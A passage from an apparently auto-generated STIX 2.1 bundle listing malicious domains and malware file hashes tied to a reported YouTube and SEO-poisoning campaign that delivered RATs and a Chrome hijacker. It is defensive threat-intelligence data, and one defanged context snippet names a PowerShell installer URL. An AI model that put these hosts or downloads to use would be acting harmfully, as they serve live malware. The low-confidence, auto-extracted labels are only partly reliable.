Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: helake[.]info ; uy.basesfiles[.]com ; basesfile[.]com ; igk.filexspace[.]com ; ikx.filexspace[.]com ; filexstorage[.]site ; filescloud","pattern":"[domain-name:value = 'filexspace.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9019ff20-c581-4dd3-b29b-a2e7ad78f418","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: filexstorage.site","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: sfile[.]com ; igk.filexspace[.]com ; ikx.filexspace[.]com ; filexstorage[.]site ; filescloud[.]pro ; zippyfiles[.]net ; mifilesx[.]site ;","pattern":"[domain-name:value = 'filexstorage.site']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--da1f4404-8620-4829-9c9e-8d635699d4a0","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: finersto.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ARKTunnel WebSocket RAT C2 server Domain vendralo[.]info ; finersto[.]com ; mqsearch[.]com ; extentrack[.]com ; drelto[.]info Docro","pattern":"[domain-name:value = 'finersto.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f0859ca9-06ce-4f26-8520-8910117c3285","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: fuelleg.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: lview[.]xyz ; trickflag[.]info ; suitstraw[.]info ; connect.fuelleg[.]info ; vesselsystem[.]xyz ; minewave[.]info ; collartitle[.]in","pattern":"[domain-name:value = 'fuelleg.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--90d89264-c827-44ff-8fe9-276f5ddf6c52","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: ggclicker.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: es[.]net ; mifilesx[.]site ; dw.xrsdownload[.]com ; storage.ggclicker[.]com ; watchadvance[.]com Initial-access SEO-poisoning and fak","pattern":"[domain-name:value = 'ggclicker.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b9c50400-08dd-431f-af97-9076c6b7c785","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: mifilesx.site","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: filexstorage[.]site ; filescloud[.]pro ; zippyfiles[.]net ; mifilesx[.]site ; dw.xrsdownload[.]com ; storage.ggclicker[.]com ; watcha","pattern":"[domain-name:value = 'mifilesx.site']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a6901554-f6c9-406e-837b-8365992347a2","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: minewave.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: traw[.]info ; connect.fuelleg[.]info ; vesselsystem[.]xyz ; minewave[.]info ; collartitle[.]info ; boardmagic[.]info ; placespoon[.]x","pattern":"[domain-name:value = 'minewave.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b775f296-0720-4519-babe-a076877384d4","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: mqsearch.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ket RAT C2 server Domain vendralo[.]info ; finersto[.]com ; mqsearch[.]com ; extentrack[.]com ; drelto[.]info Docro Hijacker rule de","pattern":"[domain-name:value = 'mqsearch.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cc7db3eb-f388-4c5f-8ffc-2e0924420b92","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: needcherries.online","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: collartitle[.]info ; boardmagic[.]info ; placespoon[.]xyz ; needcherries[.]online OfferLoader installation-tracker infrastructure Domain ve","pattern":"[domain-name:value = 'needcherries.online']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c99ed310-c374-470b-a096-ff764fa3ea4d","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: noiseship.cfd","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: earch hijacking, callback, and script infrastructure Domain noiseship[.]cfd ; atthelake[.]info ; uy.basesfiles[.]com ; basesfile[.]co","pattern":"[domain-name:value = 'noiseship.cfd']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9977fc7d-0be4-4d02-8047-6095beaf2e0f","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: pcsdkflyer.ca","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ia RAT stage hosts and Python-agent C2 typosquat Domain reg.pcsdkflyer[.]ca ARKTunnel WebSocket RAT C2 server Domain vendralo[.]info","pattern":"[domain-name:value = 'pcsdkflyer.ca']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a592d680-1f5b-42bd-a237-6ec27174ee5a","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: placespoon.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: minewave[.]info ; collartitle[.]info ; boardmagic[.]info ; placespoon[.]xyz ; needcherries[.]online OfferLoader installation-tracker","pattern":"[domain-name:value = 'placespoon.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--83817a14-a59f-4c84-bb8f-5c57dfcfee4c","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: statementtouch.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ake file-hosting infrastructure Domain voyagemist[.]space ; statementtouch[.]xyz ; chawton[.]info OfferLoader payload handoff and second-s","pattern":"[domain-name:value = 'statementtouch.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0988aef4-c91d-46b2-8b79-367ebfbc455a","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: stryper.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: cro\\ Docro Chrome extension installation path URL hxxps[:]//stryper[.]info/t.ps1 Stage-two PowerShell installer for Insomnia RAT URL","pattern":"[domain-name:value = 'stryper.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9459c7cc-f5c3-4d1e-9f10-51c3da550119","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: suitstraw.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: nd-stage hosts Domain animalview[.]xyz ; trickflag[.]info ; suitstraw[.]info ; connect.fuelleg[.]info ; vesselsystem[.]xyz ; minewave[","pattern":"[domain-name:value = 'suitstraw.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b48bf3d0-f3de-40fe-8be2-2b5944208c16","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: trickflag.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ad handoff and second-stage hosts Domain animalview[.]xyz ; trickflag[.]info ; suitstraw[.]info ; connect.fuelleg[.]info ; vesselsyste","pattern":"[domain-name:value = 'trickflag.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7466761c-4317-4ac6-93b7-7e1433dbacba","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: vendralo.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: eg.pcsdkflyer[.]ca ARKTunnel WebSocket RAT C2 server Domain vendralo[.]info ; finersto[.]com ; mqsearch[.]com ; extentrack[.]com ; dr","pattern":"[domain-name:value = 'vendralo.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--dcc7b4f7-f32a-4d07-857b-0d2f81ec53c4","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: venrx.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ot[.]com ; venrx.blogspot[.]com ; venrxhub.blogspot[.]com ; venrx[.]xyz ; ravexoffical.blogspot[.]com ; adex-blog.blogspot[.]com","pattern":"[domain-name:value = 'venrx.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--52712d72-5cc6-4d5b-9990-e886f7a319b1","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: vesselsystem.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ckflag[.]info ; suitstraw[.]info ; connect.fuelleg[.]info ; vesselsystem[.]xyz ; minewave[.]info ; collartitle[.]info ; boardmagic[.]inf","pattern":"[domain-name:value = 'vesselsystem.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--74fc0744-149a-48ff-96a3-77bb4a62ae04","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: voyagemist.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: s SEO-poisoning and fake file-hosting infrastructure Domain voyagemist[.]space ; statementtouch[.]xyz ; chawton[.]info OfferLoader paylo","pattern":"[domain-name:value = 'voyagemist.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--75fbc399-5965-4208-ac3f-70475ea5bce4","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: watchadvance.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: x[.]site ; dw.xrsdownload[.]com ; storage.ggclicker[.]com ; watchadvance[.]com Initial-access SEO-poisoning and fake file-hosting infras","pattern":"[domain-name:value = 'watchadvance.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--796a015f-f4c0-46fd-a663-548971091c63","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: xrsdownload.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: filescloud[.]pro ; zippyfiles[.]net ; mifilesx[.]site ; dw.xrsdownload[.]com ; storage.ggclicker[.]com ; watchadvance[.]com Initial-ac","pattern":"[domain-name:value = 'xrsdownload.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1630194e-a787-4b3f-ba83-5664d97ad0f3","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: zippyfiles.net","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: filexspace[.]com ; filexstorage[.]site ; filescloud[.]pro ; zippyfiles[.]net ; mifilesx[.]site ; dw.xrsdownload[.]com ; storage.ggclic","pattern":"[domain-name:value = 'zippyfiles.net']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--75712855-81f0-4d5c-9c0d-64fa3f5f02e0","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 06e0afd01bbc6c9d5dc16c3165089b233dc071e1f251abd06235d1b9166cdac5","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: de3cdf Resource icon shared across ARKTunnel samples SHA256 06e0afd01bbc6c9d5dc16c3165089b233dc071e1f251abd06235d1b9166cdac5 Resource icon shared across ARKTunnel samples SHA256 2c6e11","pattern":"[file:hashes.'SHA-256' = '06e0afd01bbc6c9d5dc16c3165089b233dc071e1f251abd06235d1b9166cdac5']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7f388094-2a87-41ee-aaa4-16c209760d6e","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 25558ea78c4aa0fdd0f45fafcaa546d3115dc5806809d144a5801a40e48fd4c5","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: 9ed15ce1a6961 eld0.exe , Insomnia RAT initial loader SHA256 25558ea78c4aa0fdd0f45fafcaa546d3115dc5806809d144a5801a40e48fd4c5 eld0.tmp unpacked loader stage SHA256 9b0d9cbc0fd4a7bae8b78","pattern":"[file:hashes.'SHA-256' = '25558ea78c4aa0fdd0f45fafcaa546d3115dc5806809d144a5801a40e48fd4c5']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--afe468e7-1a39-492e-8ef0-3a47ec6b4cb8","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 2c6e11027b011042c9a118fc20728f8f4ebb6be8795cc84cc9a45622c297d354","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: 6cdac5 Resource icon shared across ARKTunnel samples SHA256 2c6e11027b011042c9a118fc20728f8f4ebb6be8795cc84cc9a45622c297d354 eld2.exe , Docro Hijacker branch installer SHA256 553ce594c","pattern":"[file:hashes.'SHA-256' = '2c6e11027b011042c9a118fc20728f8f4ebb6be8795cc84cc9a45622c297d354']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--31c9ae14-0925-4e91-8296-aaafb89186d1","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 3052bd320a34e12ee694811ed0578797477dfd480c664491e509ed15ce1a6961","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: efff1f2d73 windirstat.tmp unpacked OfferLoader stage SHA256 3052bd320a34e12ee694811ed0578797477dfd480c664491e509ed15ce1a6961 eld0.exe , Insomnia RAT initial loader SHA256 25558ea78c4aa","pattern":"[file:hashes.'SHA-256' = '3052bd320a34e12ee694811ed0578797477dfd480c664491e509ed15ce1a6961']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--16b38a97-0aad-4542-b58a-574c4b5b7240","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 553ce594c9c6afdd4794fddc28c194e3bc3c1b052310e5099c58ac15bab72104","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: 2c297d354 eld2.exe , Docro Hijacker branch installer SHA256 553ce594c9c6afdd4794fddc28c194e3bc3c1b052310e5099c58ac15bab72104 eld2.tmp , unpacked Docro Hijacker stage SHA256 fdcc95b7791","pattern":"[file:hashes.'SHA-256' = '553ce594c9c6afdd4794fddc28c194e3bc3c1b052310e5099c58ac15bab72104']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e86fc7bf-08f7-4232-9b99-88f0aff30a2f","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 62d49d0c78207ec2452cc8a30501db771c9edbae89889e41a7dd227551243e8e","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: de Python component of the Insomnia RAT dual payload SHA256 62d49d0c78207ec2452cc8a30501db771c9edbae89889e41a7dd227551243e8e aa.js , Node.js component of the Insomnia RAT dual payload","pattern":"[file:hashes.'SHA-256' = '62d49d0c78207ec2452cc8a30501db771c9edbae89889e41a7dd227551243e8e']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6440f2b8-e2af-4034-8129-ce88214b6be7","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 7f792c45de1e28fd42ac44c9444f157a2161742d130bac336c0e991aabbb112c","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: rs of Compromise (IoCs):- Type Indicator Description SHA256 7f792c45de1e28fd42ac44c9444f157a2161742d130bac336c0e991aabbb112c Trojanized windirstat.exe OfferLoader installer delivered t","pattern":"[file:hashes.'SHA-256' = '7f792c45de1e28fd42ac44c9444f157a2161742d130bac336c0e991aabbb112c']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--df2a9c70-40d6-4f0e-9e32-d806ebdf0fbf","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 9b0d9cbc0fd4a7bae8b78a15dfbe63052779414ad725845732c4a0083008da69","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: 9d144a5801a40e48fd4c5 eld0.tmp unpacked loader stage SHA256 9b0d9cbc0fd4a7bae8b78a15dfbe63052779414ad725845732c4a0083008da69 a.dll , PowerShell downloader for Insomnia RAT stages SHA25","pattern":"[file:hashes.'SHA-256' = '9b0d9cbc0fd4a7bae8b78a15dfbe63052779414ad725845732c4a0083008da69']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--55d3b9d8-863d-447b-876b-42c791eea959","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: aaebc8c07de485be6d1bfa956668c5e18aa1ff5588dfe84672e20ae90b4560f1","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: , Node.js component of the Insomnia RAT dual payload SHA256 aaebc8c07de485be6d1bfa956668c5e18aa1ff5588dfe84672e20ae90b4560f1 eld1.exe , ARKTunnel steganography dropper SHA256 e05bc22af","pattern":"[file:hashes.'SHA-256' = 'aaebc8c07de485be6d1bfa956668c5e18aa1ff5588dfe84672e20ae90b4560f1']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--532b2724-4e99-4da3-9a5a-599310a9efc7","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: b367762140ae7f5098230b8a5da738c9241f286281ec9439dd6ca581fc87989c","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: Trex.zip , archive extracted from the bitmap payload SHA256 b367762140ae7f5098230b8a5da738c9241f286281ec9439dd6ca581fc87989c wscl.exe , ARKTunnel WebSocket tunneling RAT SHA256 d8d783f","pattern":"[file:hashes.'SHA-256' = 'b367762140ae7f5098230b8a5da738c9241f286281ec9439dd6ca581fc87989c']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--596e52d5-b9c8-45eb-a521-874973848e25","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: ceb30a5eb9ad9d9c6712c80726df16f96f99d9fc0753be241b00b4d636eb576e","description":"Seen in \"Hackers Abuse 